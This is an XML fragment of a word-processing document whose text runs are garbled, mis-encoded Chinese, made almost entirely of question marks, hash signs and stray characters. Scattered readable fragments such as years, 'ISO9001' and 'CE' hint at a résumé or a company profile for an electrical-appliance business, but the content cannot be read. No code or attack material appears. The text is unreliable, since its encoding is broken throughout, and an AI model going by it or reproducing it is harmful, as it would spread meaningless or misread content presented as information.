    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#1#9#9#7#t^???_?l?]f[b??ef[#N#Nf[?Xf[MO#01#9#9#8#t^?eQ?m3W?#ZlQ?S1\?N#N?R?~#t#N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L?#g?#\ O#ahV#?.U????SHQ?v3#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>P#?2#0#0#5#t^?eQ?m3W?:NlQ?S1\?N#?.U??~#t#N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w3#t^?e?:NlQ?S?N?T?g?^?N#b?q?vhQ?V#?.UQ?~#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#"??R#?#??N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T_#_#_#?s#\?s_#_#_#'`+R_#_#_#sY_#_#_#_#_#_#t^??_#_#_#_#_#3#5#_#_#_#_#M|/?_#_#_#Vn#SfkIl_#_#_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#f[?S_#_#,g?y_#_#_#_#_#f[MO_#f[?X_#_#_#_#@bf[#N#N_#_#_#_#_##O??_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?k#Nb?!h_#_#_#Vn#S"??~f[b?_#_#_#_#7b?S@b(W0W_#_#_#fkIl_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#;N???~?S?T#N?~#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># #_#_#_#_#_#_#_#??~#O??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n#SfkIl?N#0Vn#S"??~f[b??k#N#01#9#9#8#t^?eQ?m3W?[?X?^lQ?S1\?N#O??#N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??#?#?#b,g8h?{?]\O#?2#0#0#4#t^?eQ?m3W?:NlQ?S1\?N"??R??~#t#N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hQb?"?#z?N?R#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{</w:t>
        <w:tab/>
        <w:t>N?#R # #?N?T?N?T_#_#_#_#_#_#_#?[?bzf???{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?W?NR??^?[?b?v#N?N?_M??N?T?L?GS?~?bU\#x?S?Qeg?v#N*N?N?T?~#T#0#S?b#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?#?#??_M?</w:t>
        <w:tab/>
        <w:t>?#0 # # # #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?[?b#a?^aS?#?qQ1#0#*N?|#R2#5#&gt;k?S?O</w:t>
        <w:tab/>
        <w:t>??b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#M#1#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N!k?R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x?O?[7b?[hQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?~?6R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\5??T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??N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#o??N?R</w:t>
        <w:br/>
        <w:t>N O?b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e???c???bQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##_&gt;epenc?c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e#c#T?y#NaS#??|?~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##N)R?O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#E#\#I#S#O#9#0#0#0#1#???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S5u#_sQ#??_M?</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>### # # # # # #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?V?Q??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?+R?b?S?T?e??v?S5u#_sQ#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?[?bO(u&gt;?#g?6q?e5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#T?l#_?aS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N???S5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Q#R????#0?kt^?Ndk?N?T?k??[?b???~5u??1#0#0#-#3#0#0#?^#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#dk#_sQsS?csS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#?yr?k?[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S?~?S?~|Q?[#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#dk?N?T?]??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e?~e??c#_sQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###sS?csS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1u?fbc?N#a#_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S?S?~?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 #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?S?[?s??#aopIQ?~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e??c#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##N*Ne??chV?S?N?c6R?[?b?Q?N?T#_sQ5uhV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?[?N(WR??^?S?N?N?S?f?N'`#S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?e?~#S/f'Y?R@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?^/f*N????^(u5?0W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#dk?N?T?]#_?Y??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[?b?{?[?s#??f?[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?R??#N#??d&gt;e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k?R??/fR??^#NOS#O????</w:t>
        <w:tab/>
        <w:t>Nt^?Q?_#Onf?S?v#N*NR??^??#Y#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?R???N#?????#0?[???+R?b?Q/f&amp;T</w:t>
        <w:tab/>
        <w:t>g?N#b#??[?N/f&amp;T?eQaw w?r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q#Tzf??#???zz#?)n?^?TsQ?z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N&gt;N?c?eGW??5u2#?^?N</w:t>
        <w:br/>
        <w:t>N#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?N</w:t>
        <w:br/>
        <w:t>N?R??GW^\?V?Q??#R#0dk?N?T#\*g??N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,g?|?~?N?T?|#T???{:g?c6R#0#???#0?{#tI{?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Ny??b/g^\?N?V?Q??#R#0#N?V?~?????T?cGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R:N?W?p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Q?S?s</w:t>
        <w:tab/>
        <w:t>g?v?Tck(W3u???v?w??NCg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#FU#h#?G#O#F#A#R##0O#N#W#E#L#L##0O#C#K#?]lQJTO(u#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_##N)R#?#Y?#N)R1#5#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(u?e?W#Ny??]lQ#^#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#ck(W3u??#Y?3#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(u?e?W2#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f#Ny?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v#h#^:W#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#R??^_#_#_#_#_#_##0_#_#_#_#_#_#?b0W?N#^:W_#_#_#_#_#_#_##0_#_#_#_#_#?[?^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N?T?f?ebc?NhT#g#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#5#-#8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?^?vň?O#g#N,?:N5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uP[?N?T?vck8^O(ut^P??^?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N??ǐ8#t^#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?N?T#h?Q#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#I#S#O#9#0#0#1##0C#E##0C#C#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??~?c?,glQ?S?N?T/#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?v?z?N#O?R</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#,gy??v?N?T'Y?#R^\?N#^:W</w:t>
        <w:br/>
        <w:t>N?l</w:t>
        <w:tab/>
        <w:t>g?z?N?[Kb?v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?S^\?N?e?N?T?v?R??GS?~#0?e</w:t>
        <w:tab/>
        <w:t>g#?Bl?S?l</w:t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(?#S?z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1\/f#b?N?N?T?v,g(?#O?R@b(W#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#?N?e#b</w:t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MR4#*N?N?T</w:t>
        <w:tab/>
        <w:t>g3#*N/f?N?e#b</w:t>
        <w:tab/>
        <w:t>g?v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^:W??э#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#?????Q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T?v????/f????#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[0O???k)Y??5u2#-#3#?^#0?*N9?(u?vS_?N,gy??v?N?T?N&lt;P#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#?cGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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?^?[?b?v?[?N#g#????_0R</w:t>
        <w:br/>
        <w:t>\?N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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(W?^</w:t>
        <w:br/>
        <w:t>N#b(W?NUO#N*N0W?e??#_sQo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_IQ5u?zz#?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?_?[?N(WR??^=\?Nua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Nh?R??^?v?N?T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R#0?d&gt;ehV?v\O(u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_?[?N?VON???NeQ w</w:t>
        <w:tab/>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N?`#w5u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&gt;e{??PN/f#g}Y?v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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?(W#wfN#O?[?e?_N/f#N*N#?Bl#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#zf??#S#z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GSR??^4l?Q#0R??^?[?b?v?N&lt;P?Tzf????#YO(u#z?^#bck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[?b?beQzf????#Y/fp_&gt;fR??^?[?R?T?[?N?N?S#0?e?~#S/f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b#N?[????eQ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&gt;ehV?f/f(Wt^{??N-NAmL??]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?^#_??*N??#Y&gt;f?_?[?b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N#N&gt;y#O?N?1???#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#FU#N!j#_?O??R??^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N?N9?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?R??^O(u?y?g'`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?[lQ?Seg?I{?NMQ9??^?z#N*NR??^?[?b#?.Us^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#?.U???0R#N?[#z?^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?v#?.U?1\#O#S:N?S)R(u?vD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ǐ?N?T?vnbc?N&lt;P?6qǐ!n0R???z?v#?.Us^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nbc?N&lt;PKN#T??S?N8l?~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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[.U#T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?T#??T???S?N)R(u?*N?e#_nbc#0bc#?KN#b?N?^?z?N#N?yR??^?[7b?S??(u#b?N?v?N?T1\?S?N?~??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N?N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fbchT#gKN#T??S?Nn??V#0?b#_nbc?N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??S?NNOcO#?.UR??^?[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R(u#b?N?v)Y6q?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?#O(W?g*N?e?k??c:d#zz???ZP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N#Neg?v#u#a#0?V:N#b?N?vQ?~/f?e;R?_{??~?b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d?^s^?S?v???R?R??_N?S?NZP'YZP:_#0?V:N?[?b?Oo`?v?[?e?S???[#b?Neg?/f#gNO#b,g?v#N?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N/f???bQ?v?W@x#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?N?T?v.U#T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?RQ?~?T(u7b?b/g/e#c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#b?N?]?~?^?z</w:t>
        <w:tab/>
        <w:t>ghQ?V#T0W?v.U#T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?RQ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?~#?FUQ?~/f??S?v#01#0#t^eg#N?v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?NhQ?VR??^#02#4##\?e??</w:t>
        <w:tab/>
        <w:t>g?b/g/e#c#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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?V?#R # ##xvz#N#_?S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S?]?_?v#xvz#N#_?S#b?g?SvQ?b/gHQ?'`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_##b?N?v?N?T?S?~2#t^xd"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b#x?S#b?W#0/f?[?k#^:W</w:t>
        <w:br/>
        <w:t>N?v?N?T#_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?v?N?T??^/f?z(W+R?N????</w:t>
        <w:br/>
        <w:t>N?^?z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?v#b?q/f?[7b?^??#X?yw?eg?v#0?V?~?[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OOL?#N?e#T1\/f#b?N?O#cHQ?'`?v?e?l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V?Q#Y?`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(W?b/g#N?N?T#_?S?eb??v?V?Q#Y?z?N?[Kb#?5#?[</w:t>
        <w:tab/>
        <w:t>??`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SlQ?S:N?c??z?N?R?bǒ?S?v?c?e#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#?V#Y#?V#I#N#G#C#A#R#D#,##N#NZPR??^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vQ?[?^8O?N?T#0R??^#??vMR(W?V?Q?N??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N0R0#.#1#%##0:NR??^#??VE?,{#N?T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#0#t^?S?S#0?T?y#\?N&lt;h?(???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N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iR#N#N*N?TLr#O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?N(W?V?Q#^:W??</w:t>
        <w:tab/>
        <w:t>g?SU\#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?V?Q#??m3W#^1r?#\5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ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R??^#??T?[(u#c?~#?:N;N#0R??^#?(W4##05##f?~R??^?v`S</w:t>
        <w:tab/>
        <w:t>g?#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4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&lt;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?#f?~R??^#^:W?b</w:t>
        <w:tab/>
        <w:t>g?#\#0:N?V?QR??^#???4Y#01#7#t^?S?S#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#z??_?_???[#N</w:t>
        <w:tab/>
        <w:t>gP?lQ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R??^#?:N;N%?#0:g?h?R?]???R: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%?R??^#?1#5#t^#0?vMR^\?N?V?Q#N?~R??^?#??T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(u`S5#%#?]?S#^:W#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#WSwm?R?~?y?b</w:t>
        <w:tab/>
        <w:t>gP?lQ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R??^#?:N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g?h?R?]???R:_#0(W?V?Q?v?N??#N#blQ?S?vS_#0t^#?.U'Y?~3##NWY?]?S#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?m3W#R?esO?y?b</w:t>
        <w:tab/>
        <w:t>gP?lQ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N1#4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%?R??^#?#0?R?]???R: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^#?.U?3##NWY?]?S#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
